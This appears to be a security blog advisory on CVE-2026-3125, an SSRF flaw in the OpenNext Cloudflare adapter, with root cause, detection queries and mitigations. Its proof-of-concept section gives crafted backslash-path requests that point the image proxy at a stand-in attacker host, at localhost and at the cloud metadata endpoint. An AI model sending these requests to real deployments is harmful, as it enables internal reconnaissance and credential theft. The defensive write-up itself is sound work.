CVE-2026-3125: Cloudflare OpenNext Path Normalization Flaw Enables High-Risk SSRF Attacks on Next.js Deployments

Aegiron 12 mins0

CVE-2026-3125 — SSRF via Path Normalization Bypass in @opennextjs/cloudflare

CVE ID: CVE-2026-3125
Vulnerability Type: Server-Side Request Forgery (SSRF)
Affected Component: @opennextjs/cloudflare (OpenNext adapter used for deploying Next.js applications on Cloudflare Workers)
Severity: High
CVSS Score: 7.7 (CVSS v3.1)
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: Low
Availability Impact: Low
Exploitability: High
Exploit Availability: Public exploitation techniques are possible using crafted HTTP requests (should only be used for security testing and educational purposes)

Overview

A Server-Side Request Forgery (SSRF) vulnerability has been identified in the @opennextjs/cloudflare package used to run Next.js applications on Cloudflare infrastructure. The vulnerability arises due to inconsistent handling of URL paths between the Cloudflare edge layer and the JavaScript runtime executing inside Cloudflare Workers.

Certain internal routes used by Cloudflare, particularly those under the /cdn-cgi/ namespace, are expected to be intercepted by the Cloudflare edge network before requests reach the application runtime. These routes typically handle internal services such as image optimization or platform-level operations and are not intended to be processed by application code.

However, it was observed that when a backslash (\) character is used instead of a forward slash (/) in the URL path, the request may bypass the edge routing filter. The request is then forwarded to the Worker runtime where JavaScript URL parsing normalizes the backslash into a forward slash.

Because of this normalization behavior, the request is interpreted as a legitimate /cdn-cgi/image request by the application handler. Once this occurs, the worker logic may perform a server-side fetch operation to an attacker-controlled URL without properly validating the target address.

As a result, the application can be abused as a proxy capable of sending requests to internal resources or arbitrary external endpoints. This behavior creates a Server-Side Request Forgery condition.

Affected Products

The vulnerability affects deployments that rely on the Cloudflare adapter provided by OpenNext.

Affected component:

@opennextjs/cloudflare

Applications that are most likely impacted include:

  • Next.js applications deployed using OpenNext
  • Applications running on Cloudflare Workers through the OpenNext adapter
  • Deployments where the /cdn-cgi/image endpoint is reachable through application routing
  • Systems where outbound HTTP requests are not restricted

Older versions of the adapter did not enforce sufficient validation on the URLs being fetched.

Root Cause Analysis

The root cause lies in path normalization differences between two layers of request processing.

Cloudflare Edge Layer

The Cloudflare edge routing system is responsible for intercepting specific internal paths before the request reaches application logic. This filtering relies on strict matching rules and expects paths to contain forward slashes (/).

When a request is received containing a backslash (\) instead of a forward slash, the edge layer fails to recognize the path as a protected endpoint.

Worker Runtime

Once the request reaches the Worker runtime, the JavaScript URL parser processes the request path. The parser automatically normalizes the path by converting backslashes into forward slashes.

This behavior causes a path such as:

/cdn-cgi\image

to be interpreted internally as:

/cdn-cgi/image

The request is therefore processed by the image proxy handler that performs outbound HTTP requests.

Because URL validation was insufficient, the application could be forced to retrieve resources from attacker-controlled destinations.

Attack Scenario

The attack does not require authentication and can be performed remotely by sending a specially crafted HTTP request.

A typical exploitation chain may follow these steps:

  1. A vulnerable Next.js application deployed with OpenNext is identified.
  2. A crafted request containing a backslash path is sent to bypass edge filtering.
  3. The request reaches the Worker runtime where the path is normalized.
  4. The image proxy handler executes and attempts to fetch the specified URL.
  5. The attacker gains the ability to force outbound HTTP requests from the server.

This behavior may be abused for internal reconnaissance or access to restricted resources.

Potential Impact

If exploited successfully, the following impacts may occur:

Internal Network Discovery

Requests may be directed to internal addresses that are not normally reachable from the internet. This allows an attacker to identify internal services and infrastructure.

Access to Metadata Services

Cloud environments frequently expose metadata endpoints that provide information about the running instance. If reachable, sensitive configuration data or temporary credentials could be retrieved.

Exposure of Private Assets

Some Next.js deployments store incremental build artifacts or cached resources within internal directories. These resources may become accessible through crafted requests.

Proxy Abuse

The application server may be used as a relay to send requests to external targets, potentially assisting in further attacks or scanning activities.

Proof of Concept (Educational Use Only)

The following example demonstrates how the vulnerability may be triggered using a crafted HTTP request. These examples are provided strictly for defensive research and security testing.

Basic SSRF Trigger

GET /cdn-cgi\image?url=http://attacker.example/test HTTP/1.1
Host: vulnerable-site.com

Internal Service Probe

GET /cdn-cgi\image?url=http://127.0.0.1:8080 HTTP/1.1
Host: vulnerable-site.com

Metadata Endpoint Attempt

GET /cdn-cgi\image?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
Host: vulnerable-site.com

If the application attempts to retrieve these URLs, SSRF behavior is confirmed.

Indicators of Compromise

The following indicators may suggest exploitation attempts:

  • HTTP requests containing backslashes within URL paths
  • Access attempts targeting /cdn-cgi endpoints with unusual formatting
  • Worker logs showing outbound requests to internal IP ranges
  • Repeated requests attempting to fetch remote resources through image proxy parameters
  • Requests referencing metadata service IP addresses

Detection

Detection can be performed by analyzing web server logs, Cloudflare request logs, and application logs.

Particular attention should be given to request paths containing backslashes or encoded path manipulation characters.

Suspicious parameters referencing external URLs should also be investigated.

Detection Rules

Splunk Query

index=web_logs
| search uri_path="*\\cdn-cgi*"
| stats count by src_ip, uri_path, user_agent
| sort -count

Elastic / Kibana Query

url.path:*\\cdn-cgi*

Microsoft Sentinel (KQL)

CommonSecurityLog
| where RequestURL contains "\\cdn-cgi"
| summarize count() by SourceIP, RequestURL
| order by count_ desc

Generic Web Log Detection

request_uri LIKE '%\cdn-cgi%'
OR request_uri LIKE '%\image%'

Internal SSRF Destination Detection

destination_ip IN (
127.0.0.1,
10.0.0.0/8,
172.16.0.0/12,
192.168.0.0/16,
169.254.169.254
)

This query can help detect potential attempts to reach internal network resources.

Log Sources

The following log sources are valuable when investigating this vulnerability:

  • Cloudflare HTTP request logs
  • Cloudflare Worker execution logs
  • Application access logs
  • Reverse proxy logs
  • Network firewall logs
  • Outbound network monitoring systems
  • Web Application Firewall logs

Combining multiple log sources provides better visibility into exploitation attempts.

MITRE ATT&CK Mapping

TechniqueIDDescription
Exploit Public-Facing ApplicationT1190Exploiting vulnerable web applications
Network Service DiscoveryT1046Probing internal network services
Data from Cloud ServiceT1530Accessing metadata or cloud resources
Exfiltration Over Web ProtocolT1041Retrieving sensitive information through HTTP

Mitigation

Until systems are updated, the following defensive actions are recommended:

  • Reject requests containing backslashes in URL paths.
  • Restrict outbound network access from application runtimes.
  • Validate URLs before performing server-side fetch operations.
  • Block access to internal metadata IP ranges.
  • Monitor and alert on unusual /cdn-cgi request patterns.

Patch / Upgrade

The vulnerability has been addressed in newer releases of the Cloudflare adapter.

Upgrading to the patched version is strongly recommended.

Official patch information:

https://developers.cloudflare.com/changelog/post/2025-06-17-open-next-ssrf

Patched versions include improved URL validation and additional protections preventing unsafe outbound requests.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.